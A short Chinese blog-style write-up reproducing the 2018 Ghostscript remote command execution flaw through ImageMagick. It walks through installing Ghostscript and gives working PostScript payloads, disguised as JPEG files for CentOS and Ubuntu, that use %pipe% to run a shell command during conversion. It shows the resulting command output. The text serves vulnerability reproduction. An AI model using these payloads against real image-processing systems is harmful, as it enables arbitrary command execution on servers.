imagemaick的ghost script RCE漏洞
20180822
爆出了ghost script存在远程命令执行,所以,就复现验证下。
1、确认系统是否安装了gs
执行命令
gs -q -sDEVICE=ppmraw -dSAFER -sOutputFile=/dev/null
如果命令没有执行成功,那么恭喜你,你没有这个漏洞
要想复现这个漏洞,那么你需要
yum install ghostscript
ubuntu
[root@srv62 ~]# cd /usr/local [root@srv62 src]# wget http://ghostscript.com/releases/ghostscript-8.71.tar.gz [root@srv62 src]# tar zxvf ghostscript-8.71.tar.gz [root@srv62 src]# cd ghostscript-8.71 [root@srv62 ghostscript-8.71]# ./configure --prefix=/usr [root@srv62 ghostscript-8.71]# mkdir obj [root@srv62 ghostscript-8.71]# mkdir bin [root@srv62 ghostscript-8.71]# make all [root@srv62 ghostscript-8.71]# make install
2、命令执行成功了,说明系统已经安装了ghost script,然后我们来构造poc
vim shell.jpe
jpeg内容(centos)
%!PS userdict /setpagedevice undef legal { null restore } stopped { pop } if legal mark /OutputFile (%pipe%id) currentdevice putdeviceprops
然后执行
/usr/local/bin/convert shell.jpeg what.gif
现象:
uid=500(rong) gid=500(rong) groups=500(rong) convert: FailedToExecuteCommand `"gs" -q -dQUIET -dSAFER -dBATCH -dNOPAUSE -dNOPROMPT -dMaxBitmap=500000000 -dAlignToPixels=0 -dGridFitTT=2 "-sDEVICE=pngalpha" -dTextAlphaBits=4 -dGraphicsAlphaBits=4 "-r72x72" -g612x792 "-sOutputFile=/tmp/magick-55636ecO6hPgbKE2Y%d" "-f/tmp/magick-55636NeGRLWbqeU7E" "-f/tmp/magick-55636jIlkxkc2rfdl" -c showpage' (-1) @ error/utility.c/SystemCommand/2051. convert: no images defined `what.gif' @ error/convert.c/ConvertImageCommand/3187
ubuntu环境下POC:
%!PS userdict /setpagedevice undef save legal { null restore } stopped { pop } if { legal } stopped { pop } if restore mark /OutputFile (%pipe%id) currentdevice putdeviceprops